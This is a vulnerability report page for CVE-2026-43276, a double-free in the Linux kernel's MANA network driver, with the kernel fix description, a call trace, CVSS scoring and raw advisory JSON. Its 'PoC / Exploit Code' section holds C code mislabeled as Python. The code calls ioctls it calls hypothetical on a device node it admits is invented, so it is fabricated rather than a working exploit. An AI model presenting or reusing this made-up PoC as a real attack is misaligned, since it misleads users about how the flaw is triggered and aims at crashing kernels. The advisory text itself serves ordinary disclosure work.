Security Vulnerability Report
中文
CVE-2026-43276 CVSS 7.8 HIGH

CVE-2026-43276

Published: 2026-05-06 12:16:49
Last Modified: 2026-05-08 19:32:12
Source: 416baaa9-dc9f-4396-8d5f-8c081fb06d67

Description

In the Linux kernel, the following vulnerability has been resolved: net: mana: Fix double destroy_workqueue on service rescan PCI path While testing corner cases in the driver, a use-after-free crash was found on the service rescan PCI path. When mana_serv_reset() calls mana_gd_suspend(), mana_gd_cleanup() destroys gc->service_wq. If the subsequent mana_gd_resume() fails with -ETIMEDOUT or -EPROTO, the code falls through to mana_serv_rescan() which triggers pci_stop_and_remove_bus_device(). This invokes the PCI .remove callback (mana_gd_remove), which calls mana_gd_cleanup() a second time, attempting to destroy the already- freed workqueue. Fix this by NULL-checking gc->service_wq in mana_gd_cleanup() and setting it to NULL after destruction. Call stack of issue for reference: [Sat Feb 21 18:53:48 2026] Call Trace: [Sat Feb 21 18:53:48 2026] <TASK> [Sat Feb 21 18:53:48 2026] mana_gd_cleanup+0x33/0x70 [mana] [Sat Feb 21 18:53:48 2026] mana_gd_remove+0x3a/0xc0 [mana] [Sat Feb 21 18:53:48 2026] pci_device_remove+0x41/0xb0 [Sat Feb 21 18:53:48 2026] device_remove+0x46/0x70 [Sat Feb 21 18:53:48 2026] device_release_driver_internal+0x1e3/0x250 [Sat Feb 21 18:53:48 2026] device_release_driver+0x12/0x20 [Sat Feb 21 18:53:48 2026] pci_stop_bus_device+0x6a/0x90 [Sat Feb 21 18:53:48 2026] pci_stop_and_remove_bus_device+0x13/0x30 [Sat Feb 21 18:53:48 2026] mana_do_service+0x180/0x290 [mana] [Sat Feb 21 18:53:48 2026] mana_serv_func+0x24/0x50 [mana] [Sat Feb 21 18:53:48 2026] process_one_work+0x190/0x3d0 [Sat Feb 21 18:53:48 2026] worker_thread+0x16e/0x2e0 [Sat Feb 21 18:53:48 2026] kthread+0xf7/0x130 [Sat Feb 21 18:53:48 2026] ? __pfx_worker_thread+0x10/0x10 [Sat Feb 21 18:53:48 2026] ? __pfx_kthread+0x10/0x10 [Sat Feb 21 18:53:48 2026] ret_from_fork+0x269/0x350 [Sat Feb 21 18:53:48 2026] ? __pfx_kthread+0x10/0x10 [Sat Feb 21 18:53:48 2026] ret_from_fork_asm+0x1a/0x30 [Sat Feb 21 18:53:48 2026] </TASK>

CVSS Details

CVSS Score
7.8
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:linux:linux_kernel:7.0:rc1:*:*:*:*:*:* - VULNERABLE
Linux Kernel (主要版本包含MANA驱动)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
/* * PoC for CVE-2026-43276: Trigger double destroy_workqueue in mana driver * Note: This requires a system with the vulnerable MANA driver and specific hardware simulation. * This code attempts to trigger the race condition by forcing a reset and resume failure. */ #include <stdio.h> #include <stdlib.h> #include <fcntl.h> #include <unistd.h> #include <sys/ioctl.h> #include <string.h> // Hypothetical ioctl definitions for the mana driver to trigger reset #define MANA_IOCTL_RESET 0x1 #define MANA_IOCTL_INJECT_ERROR 0x2 int main() { int fd; printf("[*] Attempting to open mana device..."); // In a real scenario, this would be the actual device node fd = open("/dev/mana_control", O_RDWR); if (fd < 0) { printf("Failed. (Device not found or permissions denied)\n"); return -1; } printf("Done.\n"); printf("[*] Triggering mana_serv_reset via ioctl..."); if (ioctl(fd, MANA_IOCTL_RESET, NULL) < 0) { perror("ioctl reset failed"); } printf("Done.\n"); printf("[*] Injecting error to simulate mana_gd_resume failure (-ETIMEDOUT)..."); // This step aims to force the path into mana_serv_rescan if (ioctl(fd, MANA_IOCTL_INJECT_ERROR, NULL) < 0) { perror("ioctl inject failed"); } printf("Done.\n"); printf("[*] Waiting for kernel panic/crash (Double Free)..."); sleep(2); close(fd); return 0; }

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-43276", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2026-05-06T12:16:48.930", "lastModified": "2026-05-08T19:32:12.303", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet: mana: Fix double destroy_workqueue on service rescan PCI path\n\nWhile testing corner cases in the driver, a use-after-free crash\nwas found on the service rescan PCI path.\n\nWhen mana_serv_reset() calls mana_gd_suspend(), mana_gd_cleanup()\ndestroys gc->service_wq. If the subsequent mana_gd_resume() fails\nwith -ETIMEDOUT or -EPROTO, the code falls through to\nmana_serv_rescan() which triggers pci_stop_and_remove_bus_device().\nThis invokes the PCI .remove callback (mana_gd_remove), which calls\nmana_gd_cleanup() a second time, attempting to destroy the already-\nfreed workqueue. Fix this by NULL-checking gc->service_wq in\nmana_gd_cleanup() and setting it to NULL after destruction.\n\nCall stack of issue for reference:\n[Sat Feb 21 18:53:48 2026] Call Trace:\n[Sat Feb 21 18:53:48 2026] <TASK>\n[Sat Feb 21 18:53:48 2026] mana_gd_cleanup+0x33/0x70 [mana]\n[Sat Feb 21 18:53:48 2026] mana_gd_remove+0x3a/0xc0 [mana]\n[Sat Feb 21 18:53:48 2026] pci_device_remove+0x41/0xb0\n[Sat Feb 21 18:53:48 2026] device_remove+0x46/0x70\n[Sat Feb 21 18:53:48 2026] device_release_driver_internal+0x1e3/0x250\n[Sat Feb 21 18:53:48 2026] device_release_driver+0x12/0x20\n[Sat Feb 21 18:53:48 2026] pci_stop_bus_device+0x6a/0x90\n[Sat Feb 21 18:53:48 2026] pci_stop_and_remove_bus_device+0x13/0x30\n[Sat Feb 21 18:53:48 2026] mana_do_service+0x180/0x290 [mana]\n[Sat Feb 21 18:53:48 2026] mana_serv_func+0x24/0x50 [mana]\n[Sat Feb 21 18:53:48 2026] process_one_work+0x190/0x3d0\n[Sat Feb 21 18:53:48 2026] worker_thread+0x16e/0x2e0\n[Sat Feb 21 18:53:48 2026] kthread+0xf7/0x130\n[Sat Feb 21 18:53:48 2026] ? __pfx_worker_thread+0x10/0x10\n[Sat Feb 21 18:53:48 2026] ? __pfx_kthread+0x10/0x10\n[Sat Feb 21 18:53:48 2026] ret_from_fork+0x269/0x350\n[Sat Feb 21 18:53:48 2026] ? __pfx_kthread+0x10/0x10\n[Sat Feb 21 18:53:48 2026] ret_from_fork_asm+0x1a/0x30\n[Sat Feb 21 18:53:48 2026] </TASK>"}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-415"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.16", "versionEndExcluding": "6.18.16", "matchCriteriaId": "B4562EDA-AFEA-4C62-97CC-C83E109A5F19"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.19", "versionEndExcluding": "6.19.6", "matchCriteriaId": "373EEEDA-FAA1-4FB4-B6ED-DB4DD99DBE67"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:7.0:rc1:*:*:*:*:*:*", "matchCriteriaId": "F253B622-8837-4245-BCE5-A7BF8FC76A16"}]}]}], "references": [{"url": "https://git.kernel.org/stable/c/a9a7c3203fdc4d4a8d8a7a3b1ed05d2bb4c6e77e", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/f975a0955276579e2176a134366ed586071c7c6a", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/fa3c2f8d9152344a478abb847081c1b5f84a94f5", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.